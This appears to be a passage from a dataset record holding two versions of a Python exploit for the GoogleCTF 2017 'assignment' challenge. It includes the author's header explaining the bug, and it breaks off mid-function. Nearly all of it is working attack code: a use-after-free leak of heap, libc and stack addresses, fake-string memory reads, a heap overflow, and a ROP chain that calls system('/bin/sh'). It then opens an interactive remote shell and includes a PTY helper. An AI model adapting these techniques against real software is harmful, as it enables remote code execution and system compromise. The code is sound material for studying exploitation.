evl(b'n=\"' + fake_str + b'\"')\n payload = b'\\x00' * 64 + p64(ord('p')) + p64(input_buf + 16 + 256) + p64(\n input_buf - 7)\n payload += b'\\x00' * (384 - len(payload))\n evl(b'o=\"' + payload + b'\"')\n fake_str_addr = heap_base + 7808\n evl('p=o+{}'.format(fake_str_addr))\n payload = b'A' * 256\n payload += p64(1) + p64(input_buf + 16 + 256 + 24) + p64(0)\n payload += p64(8) + p64(ret_addr)\n evl(payload)\n binary = readstrvar('p')\n binary = u64(binary) - 2769\n print_good('binary @ 0x{:x}'.format(binary))\n offset_to_ret = ret_addr - (input_buf & 18446744073709551360)\n print_good('offset to return address: 0x{:x}'.format(offset_to_ret))\n if offset_to_ret > 40 or offset_to_ret < 0:\n print_bad('Bad offset')\n return\n prop_name = p64(binary + 2761)[1]\n if prop_name < ord('A') or prop_name > ord('z'):\n print_bad('Bad propery name: {}'.format(prop_name))\n return\n prop_name = chr(prop_name)\n print_good('property name: {}'.format(prop_name))\n payload = b'A' * 56\n payload += p64(pop_rdi)\n payload += p64(bin_sh)\n payload += p64(system)\n validate(payload, [b'\\n'])\n evl(payload)\n evl('{}=42'.format(prop_name))\n payload = b'A' * offset_to_ret\n payload += p64(add_rsp_0x48)\n validate(payload, [b'\\n'])\n evl(payload)\n time.sleep(0.5)\n interact()\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef e(d):\n \"\"\"Encode the given string instance using UTF-8.\"\"\"\n return d.encode('UTF-8')\n\n\ndef d(d):\n \"\"\"Decode the given bytes instance using UTF-8.\"\"\"\n return d.decode('UTF-8')\n\n\ndef p32(d):\n \"\"\"Return d packed as 32-bit unsigned integer (little endian).\"\"\"\n return pack('<I', d)\n\n\ndef u32(d):\n \"\"\"Return the number represented by d when interpreted as a 32-bit unsigned integer (little endian).\"\"\"\n return unpack('<I', d)[0]\n\n\ndef p64(d):\n \"\"\"Return d packed as 64-bit unsigned integer (little endian).\"\"\"\n return pack('<Q', d)\n\n\ndef u64(d):\n \"\"\"Return the number represented by d when interpreted as a 64-bit unsigned integer (little endian).\"\"\"\n return unpack('<Q', d)[0]\n\n\ndef print_good(msg):\n print(ansi(Term.BOLD) + '[+] ' + msg + ansi(Term.CLEAR))\n\n\ndef print_bad(msg):\n print(ansi(Term.COLOR_MAGENTA) + '[-] ' + msg + ansi(Term.CLEAR))\n\n\ndef print_info(msg):\n print('[*] ' + msg)\n\n\ndef bytes_and_strings_are_cool(func):\n \"\"\"Decorator to encode arguments that are string instances.\"\"\"\n\n def inner(*args, **kwargs):\n nargs = tuple(map(lambda arg: e(arg) if isinstance(arg, str) else\n arg, args))\n nkwargs = dict(map(lambda k, v: (k, e(v)) if isinstance(v, str) else\n (k, v), kwargs))\n return func(*nargs, **nkwargs)\n return inner\n\n\ndef validate(data, badchars):\n \"\"\"Assert that no badchar occurs in data.\"\"\"\n assert all(b not in data for b in badchars)\n\n\ndef is_printable(b):\n \"\"\"Return true if the given byte is a printable ASCII character.\"\"\"\n return b in e(string.printable)\n\n\ndef hexdump(data):\n \"\"\"Return a hexdump of the given data. Similar to what `hexdump -C` produces.\"\"\"\n\n def is_hexdump_printable(b):\n return (b in\n b' 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz`~!@#$%^&*()-_=+[]{}\\\\|\\'\";:/?.,<>'\n )\n lines = []\n chunks = (data[i * 16:i * 16 + 16] for i in range((len(data) + 15) // 16))\n for i, chunk in enumerate(chunks):\n hexblock = ['{:02x}'.format(b) for b in chunk]\n left, right = ' '.join(hexblock[:8]), ' '.join(hexblock[8:])\n asciiblock = ''.join(chr(b) if is_hexdump_printable(b) else '.' for\n b in chunk)\n lines.append('{:08x} {:23} {:23} |{}|'.format(i * 16, left,\n right, asciiblock))\n return '\\n'.join(lines)\n\n\nclass Term:\n COLOR_BLACK = '30'\n COLOR_RED = '31'\n COLOR_GREEN = '32'\n COLOR_BROWN = '33'\n COLOR_BLUE = '34'\n COLOR_MAGENTA = '35'\n COLOR_CYAN = '36'\n COLOR_WHITE = '37'\n CLEAR = '0'\n UNDERLINE = '4'\n BOLD = '1'\n ESCAPE_START = '\\x1b['\n ESCAPE_END = 'm'\n\n\ndef ansi(*args):\n \"\"\"Construct an ANSI terminal escape code.\"\"\"\n code = Term.ESCAPE_START\n code += ';'.join(args)\n code += Term.ESCAPE_END\n return code\n\n\nclass DisconnectException(Exception):\n pass\n\n\nclass Pattern:\n \"\"\"De-Bruijn sequence generator.\"\"\"\n alphabet = string.digits + string.ascii_letters\n\n def __init__(self, length):\n if length <= len(self.alphabet):\n self._seq = self.alphabet[:length]\n elif length <= len(self.alphabet) ** 2:\n self._seq = self._generate(2)[:length]\n elif length <= len(self.alphabet) ** 3:\n self._seq = self._generate(3)[:length]\n elif length <= len(self.alphabet) ** 4:\n self._seq = self._generate(4)[:length]\n else:\n raise Exception('Pattern length is way to large')\n\n def _generate(self, n):\n \"\"\"Generate a De Bruijn sequence.\"\"\"\n k = len(self.alphabet)\n a = [0] * k * n\n sequence = []\n\n def db(t, p):\n if t > n:\n if n % p == 0:\n sequence.extend(a[1:p + 1])\n else:\n a[t] = a[t - p]\n db(t + 1, p)\n for j in range(a[t - p] + 1, k):\n a[t] = j\n db(t + 1, t)\n db(1, 1)\n return ''.join(self.alphabet[i] for i in sequence)\n\n def bytes(self):\n \"\"\"Return this sequence as bytes.\"\"\"\n return e(self._seq)\n\n def __str__(self):\n \"\"\"Return this sequence as string.\"\"\"\n return self._seq\n\n @bytes_and_strings_are_cool\n def offset(self, needle):\n \"\"\"Returns the index of 'needle' in this sequence.\n\n 'needle' should be of type string or bytes. If an integer is provided\n it will be treated as 32-bit or 64-bit little endian number, depending\n on its bit length.\n \"\"\"\n if isinstance(needle, int):\n if needle.bit_length() <= 32:\n needle = p32(needle)\n else:\n needle = p64(needle)\n needle = d(needle)\n idx = self._seq.index(needle)\n if self._seq[idx + len(needle):].find(needle) != -1:\n raise ValueError('Multiple occurances found!')\n return idx\n\n\nclass Channel:\n \"\"\"Convenience wrapper around a socket.\"\"\"\n OUTGOING_COLOR = Term.COLOR_RED\n INCOMING_COLOR = Term.COLOR_BLUE\n\n def __init__(self, sock, verbose):\n self._s = sock\n self._verbose = verbose\n self._buf = bytearray()\n\n def _prettyprint(self, data, outgoing):\n \"\"\"Prettyprint the given data.\n\n This does the following: All data that is valid ASCII is colorized according to the direction of the traffic.\n Everything else is converted to hex, then printed in bold and underline for visibility.\n\n Only ASCII is supported as of now. This might be the better choice anyway since otherwise valid UTF-8 might be\n detected in arbitrary binary streams.\n \"\"\"\n TEXT = 0\n BINARY = 1\n X = 4\n Y = 16\n Z = 2\n color = self.OUTGOING_COLOR if outgoing else self.INCOMING_COLOR\n parts = []\n curr = ''\n for b in data:\n if is_printable(b):\n parts.append((TEXT, b))\n else:\n parts.append((BINARY, b))\n i = 0\n mergedparts = []\n while i < len(parts):\n t = parts[i][0]\n arr = [parts[i][1]]\n j = i + 1\n while j < len(parts) and parts[j][0] == t:\n arr.append(parts[j][1])\n j += 1\n i = j\n extra = []\n if t == TEXT and len(arr) > Y and i < len(parts) - 1:\n mid = len(arr) - Z - 1\n start, end = mid, mid\n char = arr[mid]\n while start >= 0 and arr[start] == char:\n start -= 1\n while end < len(arr) and arr[end] == char:\n end += 1\n if end - start >= Y + 2 and end < len(parts):\n extra = arr[end:]\n arr = arr[:end]\n mergedparts.append((t, bytes(arr)))\n if extra:\n mergedparts.append((BINARY, bytes(extra)))\n parts = mergedparts\n buf = ''\n last = None\n for tag, value in parts:\n if tag == TEXT and len(value) <= X and last == BINARY:\n tag = BINARY\n if tag == TEXT:\n buf += ansi(Term.CLEAR) + ansi(color)\n else:\n buf += ansi(color, Term.BOLD, Term.UNDERLINE)\n value = hexlify(value)\n buf += d(value)\n last = tag\n buf += ansi(Term.CLEAR)\n print(buf, end='')\n sys.stdout.flush()\n\n def setVerbose(self, verbose):\n \"\"\"Set verbosity of this channel.\"\"\"\n self._verbose = verbose\n\n def recv(self, n=4096):\n \"\"\"Return up to n bytes of data from the remote end.\n\n Buffers incoming data internally.\n\n NOTE: You probably shouldn't be using this method. Use one of the other recvX methods instead.\n \"\"\"\n if len(self._buf) < n:\n buf = self._s.recv(65536)\n if not buf and not self._buf:\n raise DisconnectException('Server disconnected.')\n if self._verbose:\n self._prettyprint(buf, False)\n self._buf += buf\n buf = self._buf[:n]\n self._buf = self._buf[n:]\n return buf\n\n def recvn(self, n):\n \"\"\"Return exactly n bytes of data from the remote end.\"\"\"\n data = []\n while len(data) != n:\n data.append(self.recv(1))\n return b''.join(data)\n\n @bytes_and_strings_are_cool\n def recvtil(self, delim):\n \"\"\"Read data from the remote end until delim is found in the data.\n\n The first occurance of delim is included in the returned buffer.\n \"\"\"\n buf = b''\n while not delim in buf:\n buf += self.recv(1)\n return buf\n\n def recvregex(self, regex):\n \"\"\"Receive incoming data until it matches the given regex.\n\n Returns the match object.\n\n IMPORTANT: Since the data is coming from the network, it's usually\n a bad idea to use a regex such as 'addr: 0x([0-9a-f]+)' as this function\n will return as soon as 'addr: 0xf' is read. Instead, make sure to\n end the regex with a known sequence, e.g. use 'addr: 0x([0-9a-f]+)\\\\n'.\n \"\"\"\n if isinstance(regex, str):\n regex = re.compile(regex)\n buf = ''\n match = None\n while not match:\n buf += d(self.recv(1))\n match = regex.search(buf)\n return match\n\n def recvline(self):\n \"\"\"Receive and return a line from the remote end.\n\n The trailing newline character will be included in the returned buffer.\n \"\"\"\n return self.recvtil('\\n')\n\n def send(self, buf):\n \"\"\"Send all data in buf to the remote end.\"\"\"\n if self._verbose:\n self._prettyprint(buf, True)\n self._s.sendall(buf)\n\n def sendnum(self, n):\n \"\"\"Send the string representation of n followed by a newline character.\"\"\"\n self.sendline(str(n))\n\n @bytes_and_strings_are_cool\n def sendline(self, l):\n \"\"\"Prepend a newline to l and send everything to the remote end.\"\"\"\n self.send(l + b'\\n')\n\n def interact(self):\n \"\"\"Interact with the remote end: connect stdout and stdin to the socket.\"\"\"\n self._verbose = False\n try:\n while True:\n available, _, _ = select.select([sys.stdin, self._s], [], [])\n for src in available:\n if src == sys.stdin:\n data = sys.stdin.buffer.read1(1024)\n self.send(data)\n else:\n data = self.recv(4096)\n sys.stdout.buffer.write(data)\n sys.stdout.flush()\n except KeyboardInterrupt:\n return\n except DisconnectException:\n print_info('Server disconnected.')\n return\n\n\ndef telnet(shell='/bin/bash'):\n \"\"\"Telnet emulation.\n\n Opens a PTY on the remote end and connects the master side to the socket.\n Then spawns a shell connected to the slave end and puts the controlling TTY\n on the local machine into raw mode.\n Result: Something similar to a telnet/(plaintext)ssh session.\n\n Vim, htop, su, less, etc. will work with this.\n\n !!! This function only works if the channel is connected to a shell !!!\n \"\"\"\n assert sys.stdin.isatty()\n c.setVerbose(False)\n code = \"import pty; pty.spawn(['{}', '-i'])\".format(shell)\n sendline('python -c \"{}\"; exit'.format(code))\n time.sleep(0.5)\n old_settings = termios.tcgetattr(sys.stdin.fileno())\n tty.setraw(sys.stdin)\n cols, rows = os.get_terminal_size(sys.stdin.fileno())\n sendline('stty rows {} cols {}; echo READY'.format(rows, cols))\n recvtil('READY\\r\\n')\n recvtil('READY\\r\\n')\n interact()\n termios.tcsetattr(sys.stdin.fileno(), termios.TCSADRAIN, old_settings)\n\n\ndef send(b):\n c.send(b)\n\n\ndef sendline(l):\n c.sendline(l)\n\n\ndef sendnum(n):\n c.sendnum(n)\n\n\ndef recv(n):\n return c.recv(n)\n\n\ndef recvtil(delim):\n return c.recvtil(delim)\n\n\ndef recvn(n):\n return c.recvn(n)\n\n\ndef recvline():\n return c.recvline()\n\n\ndef recvregex(r):\n return c.recvregex(r)\n\n\ndef interact():\n c.interact()\n\n\n<mask token>\n\n\ndef evl(code):\n sendline(code)\n\n\ndef readvar(name):\n evl('=')\n recvtil('Bad token: 0-1\\n> ')\n evl(name)\n response = recvtil('> ')\n return response.split(b'\\n')[0]\n\n\ndef readintvar(name):\n return int(d(readvar(name)))\n\n\ndef readstrvar(name):\n return readvar(name)[1:-1]\n\n\ndef heapleak():\n \"\"\"Free the lhs and rhs values during add_assign. ...\"\"\"\n for i in range(16):\n evl('{}'.format(i))\n evl('h=0+0')\n return readintvar('h') & 18446744073709547520\n\n\ndef gc(remaining):\n \"\"\"Trigger gargabe collection\"\"\"\n for i in range(remaining):\n evl('{}'.format(i))\n\n\ndef leak(addr, length):\n \"\"\"Leaks process memory by abusing the UAF to temporarily inject a fake string.\"\"\"\n fake_str_addr = heap_base + 176\n fake_str = p64(length) + p64(addr)\n evl(b'l=\"' + fake_str + b'\"')\n for i in range(15):\n evl('{}'.format(i))\n evl('a={}+x'.format(fake_str_addr))\n gc(16)\n return readstrvar('a')[0:length]\n\n\ndef leak2(addr, length):\n \"\"\"Same as above, but different offsets...\"\"\"\n fake_str_addr = heap_base + 368\n fake_str = p64(length) + p64(addr)\n evl(b'l=\"' + fake_str + b'\"')\n for i in range(12):\n evl('{}'.format(i))\n evl('a={}+x'.format(fake_str_addr))\n return readstrvar('a')[0:length]\n\n\ndef pwn():\n global heap_base\n recvtil('>')\n evl('x=\"XXXXXXXXXXXXXXXX\"')\n heap_base = heapleak()\n print_good('Heap base @ 0x{:x}'.format(heap_base))\n evl('\"{}\"'.format('A' * 256))\n gc(20 - 4)\n heap_mem = leak(heap_base, 4096)\n for i in range(0, len(heap_mem) - 16, 8):\n flink = u64(heap_mem[i:i + 8])\n blink = u64(heap_mem[i + 8:i + 16])\n if (abs(flink - heap_base) > 65536 and flink > 139637976727552 and \n flink < 140737488355328 and blink > 139637976727552 and blink <\n 140737488355328):\n break\n else:\n print_bad('No freelist pointers found :(')\n return\n libc = flink - 3938600\n print_good('libc @ 0x{:x}'.format(libc))\n env_ptr = u64(leak2(libc + 3949728, 8))\n print_good('stack @ 0x{:x}'.format(env_ptr))\n system = libc + 288144\n bin_sh = libc + 1573123\n pop_rdi = libc + 142234\n pop_rsi = libc + 149637\n pop_rdx = libc + 7054\n add_rsp_0x48 = libc + 1006475\n print_good('/bin/sh @ 0x{:x}'.format(bin_sh))\n input_buf = env_ptr - 808\n print_good('input_buf @ 0x{:x}'.format(input_buf))\n ret_addr = env_ptr - 808 - 8\n print_good('return address @ 0x{:x}'.format(ret_addr))\n evl('l.a=x')\n evl('h.a=x')\n evl('a.a=x')\n evl('b.a=x')\n evl('c.a=x')\n evl('d.a=x')\n evl('e.a=x')\n evl('f.a=x')\n for i in range(9):\n evl('\"{}\"'.format('A' * 16))\n evl('1337')\n for o in ['l', 'a', 'h', 'a', 'b', 'c', 'd', 'e', 'f']:\n for p in ALPHABET:\n evl('{}.{}=x'.format(o, p))\n for i in range(6):\n evl('1337')\n for i in 'ghijk':\n evl('{}=x'.format(i))\n fake_str = p64(18446744073709551615 - 15 - (384 - 16)) + p64(71748523475265\n ) + b'D' * 240\n evl(b'n=\"' + fake_str + b'\"')\n payload = b'\\x00' * 64 + p64(ord('p')) + p64(input_buf + 16 + 256) + p64(\n input_buf - 7)\n payload += b'\\x00' * (384 - len(payload))\n evl(b'o=\"' + payload + b'\"')\n fake_str_addr = heap_base + 7808\n evl('p=o+{}'.format(fake_str_addr))\n payload = b'A' * 256\n payload += p64(1) + p64(input_buf + 16 + 256 + 24) + p64(0)\n payload += p64(8) + p64(ret_addr)\n evl(payload)\n binary = readstrvar('p')\n binary = u64(binary) - 2769\n print_good('binary @ 0x{:x}'.format(binary))\n offset_to_ret = ret_addr - (input_buf & 18446744073709551360)\n print_good('offset to return address: 0x{:x}'.format(offset_to_ret))\n if offset_to_ret > 40 or offset_to_ret < 0:\n print_bad('Bad offset')\n return\n prop_name = p64(binary + 2761)[1]\n if prop_name < ord('A') or prop_name > ord('z'):\n print_bad('Bad propery name: {}'.format(prop_name))\n return\n prop_name = chr(prop_name)\n print_good('property name: {}'.format(prop_name))\n payload = b'A' * 56\n payload += p64(pop_rdi)\n payload += p64(bin_sh)\n payload += p64(system)\n validate(payload, [b'\\n'])\n evl(payload)\n evl('{}=42'.format(prop_name))\n payload = b'A' * offset_to_ret\n payload += p64(add_rsp_0x48)\n validate(payload, [b'\\n'])\n evl(payload)\n time.sleep(0.5)\n interact()\n\n\n<mask token>\n",
"step-5": "#!/usr/bin/env python3\n#\n# Exploit for \"assignment\" of GoogleCTF 2017\n#\n# CTF-quality exploit...\n#\n# Slightly simplified and shortened explanation:\n#\n# The bug is a UAF of one or both values during add_assign() if a GC is\n# triggered during allocate_value(). The exploit first abuses this to leak a\n# pointer into the heap by confusing an Integer Value with a Property. It then\n# abuses the UAF differently to create a fake String instance which is\n# concatenated and returned. By faking a String in the heap, we can read\n# arbitrary memory. We leak the addresses of libc and the stack. Next the\n# exploit does some heap feng shui, then fakes a string with length 0xffffffXX,\n# which triggers an integer overflow during string_concat(). This gives us a\n# heap-based buffer overflow. With that we first corrupt a Property to point\n# into the stack, then overwrite the length of the fake string with 0 to stop\n# the memcpy. We leak the address of the binary from the return address. Next\n# we write a value to the fake property. This writes a pointer to the heap into\n# the stack. With that we corrupt only the first byte of the input buffer\n# pointer so it now points further down into the stack. The next call to\n# readline() by the application then writes into the stack frame of readline()\n# and ultimately overwrites the return address => we get ROP:\n#\n# [+] Heap base @ 0x55cd3d465000\n# [+] libc @ 0x7f7ea1f79000\n# [+] stack @ 0x7ffcf044f448\n# [+] /bin/sh @ 0x7f7ea20f9103\n# [+] input_buf @ 0x7ffcf044f120\n# [+] return address @ 0x7ffcf044f118\n# [+] binary @ 0x55cd3c696000\n# [+] offset to return address: 0x18\n# [+] property name: j\n# id\n# uid=1337(user) gid=1337(user) groups=1337(user)\n# ls\n# assignment\n# flag.txt\n# cat flag.txt\n# CTF{d0nT_tHrOw_0u7_th1nG5_yoU_5ti11_u53}\n#\n# Author: Samuel <saelo> Groß\n#\n\nimport socket\nimport termios\nimport tty\nimport time\nimport sys\nimport select\nimport os\nimport re\nimport telnetlib\nimport string\nfrom struct import pack, unpack\nfrom binascii import hexlify, unhexlify\n\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Global Config\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n#TARGET = ('localhost', 4444)\nTARGET = ('assignment.ctfcompetition.com', 1337)\n\n# Enable \"wireshark\" mode, pretty prints all incoming and outgoing network traffic.\nNETDEBUG = False\n\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Encoding and Packing\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\ndef e(d):\n \"\"\"Encode the given string instance using UTF-8.\"\"\"\n return d.encode('UTF-8')\n\ndef d(d):\n \"\"\"Decode the given bytes instance using UTF-8.\"\"\"\n return d.decode('UTF-8')\n\ndef p32(d):\n \"\"\"Return d packed as 32-bit unsigned integer (little endian).\"\"\"\n return pack('<I', d)\n\ndef u32(d):\n \"\"\"Return the number represented by d when interpreted as a 32-bit unsigned integer (little endian).\"\"\"\n return unpack('<I', d)[0]\n\ndef p64(d):\n \"\"\"Return d packed as 64-bit unsigned integer (little endian).\"\"\"\n return pack('<Q', d)\n\ndef u64(d):\n \"\"\"Return the number represented by d when interpreted as a 64-bit unsigned integer (little endian).\"\"\"\n return unpack('<Q', d)[0]\n\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Output\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\ndef print_good(msg):\n print(ansi(Term.BOLD) + '[+] ' + msg + ansi(Term.CLEAR))\n\ndef print_bad(msg):\n print(ansi(Term.COLOR_MAGENTA) + '[-] ' + msg + ansi(Term.CLEAR))\n\ndef print_info(msg):\n print('[*] ' + msg)\n\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Misc.\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\ndef bytes_and_strings_are_cool(func):\n \"\"\"Decorator to encode arguments that are string instances.\"\"\"\n def inner(*args, **kwargs):\n nargs = tuple(map(lambda arg: e(arg) if isinstance(arg, str) else arg, args))\n nkwargs = dict(map(lambda k, v: (k, e(v)) if isinstance(v, str) else (k, v), kwargs))\n return func(*nargs, **nkwargs)\n return inner\n\ndef validate(data, badchars):\n \"\"\"Assert that no badchar occurs in data.\"\"\"\n assert(all(b not in data for b in badchars))\n\ndef is_printable(b):\n \"\"\"Return true if the given byte is a printable ASCII character.\"\"\"\n return b in e(string.printable)\n\ndef hexdump(data):\n \"\"\"Return a hexdump of the given data. Similar to what `hexdump -C` produces.\"\"\"\n\n def is_hexdump_printable(b):\n return b in b' 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz`~!@#$%^&*()-_=+[]{}\\\\|\\'\";:/?.,<>'\n\n lines = []\n chunks = (data[i*16:i*16+16] for i in range((len(data) + 15) // 16))\n\n for i, chunk in enumerate(chunks):\n hexblock = ['{:02x}'.format(b) for b in chunk]\n left, right = ' '.join(hexblock[:8]), ' '.join(hexblock[8:])\n asciiblock = ''.join(chr(b) if is_hexdump_printable(b) else '.' for b in chunk)\n lines.append('{:08x} {:23} {:23} |{}|'.format(i*16, left, right, asciiblock))\n\n return '\\n'.join(lines)\n\nclass Term:\n COLOR_BLACK = '30'\n COLOR_RED = '31'\n COLOR_GREEN = '32'\n COLOR_BROWN = '33'\n COLOR_BLUE = '34'\n COLOR_MAGENTA = '35'\n COLOR_CYAN = '36'\n COLOR_WHITE = '37'\n CLEAR = '0'\n\n UNDERLINE = '4'\n BOLD = '1'\n\n ESCAPE_START = '\\033['\n ESCAPE_END = 'm'\n\n# TODO rename to style and append Term.Clear ?\ndef ansi(*args):\n \"\"\"Construct an ANSI terminal escape code.\"\"\"\n code = Term.ESCAPE_START\n code += ';'.join(args)\n code += Term.ESCAPE_END\n return code\n\nclass DisconnectException(Exception):\n pass\n\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Pattern Generation\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nclass Pattern:\n \"\"\"De-Bruijn sequence generator.\"\"\"\n alphabet = string.digits + string.ascii_letters\n\n def __init__(self, length):\n if length <= len(self.alphabet):\n self._seq = self.alphabet[:length]\n elif length <= len(self.alphabet) ** 2:\n self._seq = self._generate(2)[:length]\n elif length <= len(self.alphabet) ** 3:\n self._seq = self._generate(3)[:length]\n elif length <= len(self.alphabet) ** 4:\n self._seq = self._generate(4)[:length]\n else:\n raise Exception(\"Pattern length is way to large\")\n\n def _generate(self, n):\n \"\"\"Generate a De Bruijn sequence.\"\"\"\n # See https://en.wikipedia.org/wiki/De_Bruijn_sequence\n\n k = len(self.alphabet)\n a = [0] * k * n\n sequence = []\n\n def db(t, p):\n if t > n:\n if n % p == 0:\n sequence.extend(a[1:p + 1])\n else:\n a[t] = a[t - p]\n db(t + 1, p)\n for j in range(a[t - p] + 1, k):\n a[t] = j\n db(t + 1, t)\n db(1, 1)\n return ''.join(self.alphabet[i] for i in sequence)\n\n def bytes(self):\n \"\"\"Return this sequence as bytes.\"\"\"\n return e(self._seq)\n\n def __str__(self):\n \"\"\"Return this sequence as string.\"\"\"\n return self._seq\n\n @bytes_and_strings_are_cool\n def offset(self, needle):\n \"\"\"Returns the index of 'needle' in this sequence.\n\n 'needle' should be of type string or bytes. If an integer is provided\n it will be treated as 32-bit or 64-bit little endian number, depending\n on its bit length.\n \"\"\"\n if isinstance(needle, int):\n if needle.bit_length() <= 32:\n needle = p32(needle)\n else:\n needle = p64(needle)\n needle = d(needle)\n\n idx = self._seq.index(needle)\n if self._seq[idx+len(needle):].find(needle) != -1:\n raise ValueError(\"Multiple occurances found!\")\n\n return idx\n\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Network\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nclass Channel:\n \"\"\"Convenience wrapper around a socket.\"\"\"\n OUTGOING_COLOR = Term.COLOR_RED\n INCOMING_COLOR = Term.COLOR_BLUE\n\n def __init__(self, sock, verbose):\n self._s = sock\n self._verbose = verbose\n self._buf = bytearray()\n\n def _prettyprint(self, data, outgoing):\n \"\"\"Prettyprint the given data.\n\n This does the following: All data that is valid ASCII is colorized according to the direction of the traffic.\n Everything else is converted to hex, then printed in bold and underline for visibility.\n\n Only ASCII is supported as of now. This might be the better choice anyway since otherwise valid UTF-8 might be\n detected in arbitrary binary streams.\n \"\"\"\n TEXT = 0\n BINARY = 1\n # Various Thresholds for the heuristics below\n X = 4\n Y = 16\n Z = 2\n\n\n color = self.OUTGOING_COLOR if outgoing else self.INCOMING_COLOR\n\n # Step 1: Tag every byte of the input stream with it's detected type.\n parts = []\n curr = ''\n for b in data:\n if is_printable(b):\n parts.append((TEXT, b))\n else:\n parts.append((BINARY, b))\n\n # Step 2: Merge neighboring bytes of the same type and convert the sequences to type bytes.\n i = 0\n mergedparts = []\n while i < len(parts):\n t = parts[i][0]\n arr = [parts[i][1]]\n j = i+1\n while j < len(parts) and parts[j][0] == t:\n arr.append(parts[j][1])\n j += 1\n i = j\n\n # Heuristic: If there are Y ASCII bytes with the same value followed by Z ASCII bytes followed by binary data, treat the Z bytes as binary as well.\n extra = []\n if t == TEXT and len(arr) > Y and i < len(parts) - 1:\n mid = len(arr) - Z - 1\n start, end = mid, mid\n char = arr[mid]\n while start >= 0 and arr[start] == char:\n start -= 1\n while end < len(arr) and arr[end] == char:\n end += 1\n\n # start and end point outside the range of equal-valued characters now.\n if end - start >= Y+2 and end < len(parts):\n extra = arr[end:]\n arr = arr[:end]\n\n mergedparts.append((t, bytes(arr)))\n if extra:\n mergedparts.append((BINARY, bytes(extra)))\n\n parts = mergedparts\n\n # Step 3: Merge all parts and prepend the ansi terminal escape sequences for the given type.\n buf = ''\n last = None\n for tag, value in parts:\n # Heuristic: If there is an ASCII sequence of X bytes or less surrounded by binary data, treat those as binary as well.\n if tag == TEXT and len(value) <= X and last == BINARY:\n tag = BINARY\n\n if tag == TEXT:\n buf += ansi(Term.CLEAR) + ansi(color)\n else:\n buf += ansi(color, Term.BOLD, Term.UNDERLINE)\n value = hexlify(value)\n\n buf += d(value)\n last = tag\n\n buf += ansi(Term.CLEAR)\n\n # Step 4: Print :)\n print(buf, end='')\n sys.stdout.flush()\n\n def setVerbose(self, verbose):\n \"\"\"Set verbosity of this channel.\"\"\"\n self._verbose = verbose\n\n def recv(self, n=4096):\n \"\"\"Return up to n bytes of data from the remote end.\n\n Buffers incoming data internally.\n\n NOTE: You probably shouldn't be using this method. Use one of the other recvX methods instead.\n \"\"\"\n if len(self._buf) < n:\n buf = self._s.recv(65536)\n if not buf and not self._buf:\n raise DisconnectException(\"Server disconnected.\")\n if self._verbose:\n self._prettyprint(buf, False)\n self._buf += buf\n\n # This code also works if n > len(self._buf)\n buf = self._buf[:n]\n self._buf = self._buf[n:]\n return buf\n\n def recvn(self, n):\n \"\"\"Return exactly n bytes of data from the remote end.\"\"\"\n data = []\n while len(data) != n:\n data.append(self.recv(1))\n\n return b''.join(data)\n\n @bytes_and_strings_are_cool\n def recvtil(self, delim):\n \"\"\"Read data from the remote end until delim is found in the data.\n\n The first occurance of delim is included in the returned buffer.\n \"\"\"\n buf = b''\n # TODO maybe not make this O(n**2)...\n while not delim in buf:\n buf += self.recv(1)\n return buf\n\n def recvregex(self, regex):\n \"\"\"Receive incoming data until it matches the given regex.\n\n Returns the match object.\n\n IMPORTANT: Since the data is coming from the network, it's usually\n a bad idea to use a regex such as 'addr: 0x([0-9a-f]+)' as this function\n will return as soon as 'addr: 0xf' is read. Instead, make sure to\n end the regex with a known sequence, e.g. use 'addr: 0x([0-9a-f]+)\\\\n'.\n \"\"\"\n if isinstance(regex, str):\n regex = re.compile(regex)\n buf = ''\n match = None\n\n while not match:\n buf += d(self.recv(1))\n match = regex.search(buf)\n\n return match\n\n def recvline(self):\n \"\"\"Receive and return a line from the remote end.\n\n The trailing newline character will be included in the returned buffer.\n \"\"\"\n return self.recvtil('\\n')\n\n def send(self, buf):\n \"\"\"Send all data in buf to the remote end.\"\"\"\n if self._verbose:\n self._prettyprint(buf, True)\n self._s.sendall(buf)\n\n def sendnum(self, n):\n \"\"\"Send the string representation of n followed by a newline character.\"\"\"\n self.sendline(str(n))\n\n @bytes_and_strings_are_cool\n def sendline(self, l):\n \"\"\"Prepend a newline to l and send everything to the remote end.\"\"\"\n self.send(l + b'\\n')\n\n def interact(self):\n \"\"\"Interact with the remote end: connect stdout and stdin to the socket.\"\"\"\n # TODO maybe use this at some point: https://docs.python.org/3/library/selectors.html\n self._verbose = False\n try:\n while True:\n available, _, _ = select.select([sys.stdin, self._s], [], [])\n for src in available:\n if src == sys.stdin:\n data = sys.stdin.buffer.read1(1024) # Only one read() call, otherwise this breaks when the tty is in raw mode\n self.send(data)\n else:\n data = self.recv(4096)\n sys.stdout.buffer.write(data)\n sys.stdout.flush()\n except KeyboardInterrupt:\n return\n except DisconnectException:\n print_info(\"Server disconnected.\")\n return\n\n#\n# Telnet emulation\n#\ndef telnet(shell='/bin/bash'):\n \"\"\"Telnet emulation.\n\n Opens a PTY on the remote end and connects the master side to the socket.\n Then spawns a shell connected to the slave end and puts the controlling TTY\n on the local machine into raw mode.\n Result: Something similar to a telnet/(plaintext)ssh session.\n\n Vim, htop, su, less, etc. will work with this.\n\n !!! This function only works if the channel is connected to a shell !!!\n \"\"\"\n assert(sys.stdin.isatty())\n c.setVerbose(False)\n\n # Open a PTY and spawn a bash connected to the slave end on the remote side\n code = 'import pty; pty.spawn([\\'{}\\', \\'-i\\'])'.format(shell)\n sendline('python -c \"{}\"; exit'.format(code))\n time.sleep(0.5) # No 